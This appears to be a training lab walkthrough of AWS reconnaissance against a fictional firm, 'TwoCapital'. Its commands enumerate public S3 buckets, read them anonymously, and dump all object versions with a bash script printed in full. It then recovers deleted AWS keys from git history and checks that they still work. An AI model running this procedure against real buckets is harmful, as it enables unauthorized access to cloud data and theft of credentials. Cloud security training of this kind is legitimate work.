Enumerate the TwoCapital AWS infrastructure and find the exposed public S3 bucket. Navigate to the Tools folder, change into the cloud_enum directory, and execute the following command:
cd Desktop/Tools/cloud_enum
./cloud_enum.py -k twocapital --disable-azure --disable-gcp
Output:
Great results! We discovered a few S3 buckets to check out. AWS S3 services are always interesting, as they often leak sensitive data. Navigating to the S3 bucket, we receive the following result.
Please note that, in order to retrieve S3 bucket objects, you will need either to register for a free AWS account (https://portal.aws.amazon.com/billing/signup) and create a pair of valid IAM keys (https://console.aws.amazon.com/iam/), or to use the awscli command with the "--no-sign-request" parameter.
For the purpose of this lab, we will use the "--no-sign-request" parameter.
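Before syncing anything, you can quickly confirm that the bucket is readable anonymously. A minimal check against the bucket discovered above:
aws s3 ls s3://twocapitalsource --no-sign-request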
mkdir s3
cd s3
aws s3 sync s3://twocapitalsource . # Requires a valid pair of AWS credentials
aws s3 sync s3://twocapitalsource . --no-sign-request # No credentials required
NOTE: If you encounter a 'NoSuchBucket' error while enumerating an S3 bucket, it may indicate that the default S3 bucket throttling limit has been reached. In such cases, the bucket may appear non-existent, a scenario commonly encountered in real-world engagements. To list and retrieve objects in the S3 bucket under these circumstances, use the 's3api' command instead of 's3'; the relevant 's3api' commands are shown below.
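For reference, the equivalent s3api calls look like the following: list-objects-v2 enumerates the keys, and get-object downloads a single key to a local file.
aws s3api list-objects-v2 --bucket twocapitalsource --no-sign-request
aws s3api get-object --bucket twocapitalsource --key tomasnotes tomasnotes --no-sign-request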
Output:
Two files and the .git/ folder have been retrieved. The .git directory may contain sensitive data such as API keys, developer commit comments, AWS credentials, and even administrative system passwords, along with comprehensive log details.
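A common way to hunt for leftovers like these is to search every revision of the repository, not just the working tree. A minimal sketch using standard git commands (the search pattern is only an example):
git log --oneline # summarize the commit history
git grep -iE 'key|secret|password' $(git rev-list --all) # search every revision for candidate strings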
The tomasnotes file disclosed some useful information regarding an EBS snapshot.
cat tomasnotes
Output:
You can also try the following commands to move or copy objects from s3 bucket to local machine:
aws s3 mv s3://[bucketname]/test-object localfile --no-sign-request
aws s3 cp s3://[bucketname]/test-object localfile --no-sign-request
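You can also list the full bucket contents, including nested folders, without downloading anything:
aws s3 ls s3://[bucketname] --recursive --no-sign-request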
The next step is to navigate into the .git folder and investigate the contents of the repository.
cd .git
git log
Output:
Looking through the files, nothing interesting turns up. However, the "twocapitalsource" bucket allows anyone to perform the s3:ListBucketVersions action. Let's check the objects' versions.
aws s3api list-object-versions --bucket twocapitalsource --no-sign-request
Output:
As we can see from the output of the command above, the "tomasnotes" object has multiple versions (IsLatest = false). Our goal is to dump all of them in the hope of finding previously committed sensitive information.
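Before automating this, you can pull a single older version by hand to confirm the approach. A minimal sketch, where <version-id> stands for one of the VersionId values from the output above:
aws s3api get-object --bucket twocapitalsource --key tomasnotes --version-id <version-id> tomasnotes.old --no-sign-request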
Use the following s3BucketVersionDumper bash script to list and download all versions of every object hosted in the "twocapitalsource" bucket.
cd /home/cb0004/Desktop/Tools/CloudBreach_AWSScripts
chmod +x s3BucketVersionDumper.sh
./s3BucketVersionDumper.sh
You can find the script under your Tools folder and in the CloudBreach GitHub repository: https://github.com/cloudbreach/AWSScripts . In addition, you can watch the YouTube video https://www.youtube.com/watch?v=9oeN6jd2um8 demonstrating these steps.
#!/bin/bash
cat << "EOF"
CloudBreach.io
AWS script that lists and saves all object versions from a specific public S3 bucket.
EOF
# Prompt the user to enter the S3 bucket name
read -p "Enter the S3 bucket name: " BUCKET_NAME
# Prompt the user to enter the local directory path
read -p "Enter the local dir path where the data will be saved. e.g /home/user/Desktop/s3bucket/ : " LOCAL
echo " "
echo " "
echo " "
# List all object versions in the S3 bucket
object_versions=$(aws s3api list-object-versions --bucket "$BUCKET_NAME" --no-sign-request | jq -c '.Versions[]')
# Loop through each object version and download it
while IFS= read -r object_version; do
echo "$object_version"
key=$(echo "$object_version" | jq -r '.Key')
version_id=$(echo "$object_version" | jq -r '.VersionId')
if [ -n "$key" ] && [ "$key" != "null" ] && [ "$version_id" != "null" ]; then
# Create the local directory if it doesn't exist
LOCAL_DIR="$LOCAL$key"
echo "$LOCAL_DIR"
mkdir -p "$(dirname "$LOCAL_DIR")"
aws s3api get-object --bucket "$BUCKET_NAME" --no-sign-request --key "$key" --version-id "$version_id" "$LOCAL_DIR"
fi
done <<< "$object_versions"
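For reference, the core logic of the script can be condensed into a single pipeline. This is a sketch under the assumption that object keys contain no spaces and that the output goes into a local s3bucket/ directory:
aws s3api list-object-versions --bucket twocapitalsource --no-sign-request |
  jq -r '.Versions[] | .Key + " " + .VersionId' |
  while read -r key vid; do
    mkdir -p "s3bucket/$(dirname "$key")"
    aws s3api get-object --bucket twocapitalsource --no-sign-request --key "$key" --version-id "$vid" "s3bucket/$key"
  done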
After extracting all the objects, we should check the git log of the newly dumped files.
cd s3bucket
cd .git
git log
The git log shows a message from tomas hinting that AWS secrets were removed from an earlier version of the file. To retrieve those credentials, we will have to check out the "52ac2a10867771ab187af4778f14a54d612b3747" commit.
cd ..
git checkout 52ac2a10867771ab187af4778f14a54d612b3747
ls
cat tomassecretkeys
Output:
Great! Access Key and Secret found.
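As a quick sanity check, you can verify that the recovered key pair is still active. A minimal sketch, with placeholders standing in for the values found in tomassecretkeys:
export AWS_ACCESS_KEY_ID=<access-key>
export AWS_SECRET_ACCESS_KEY=<secret-key>
aws sts get-caller-identity # confirms the keys work and reveals the associated identity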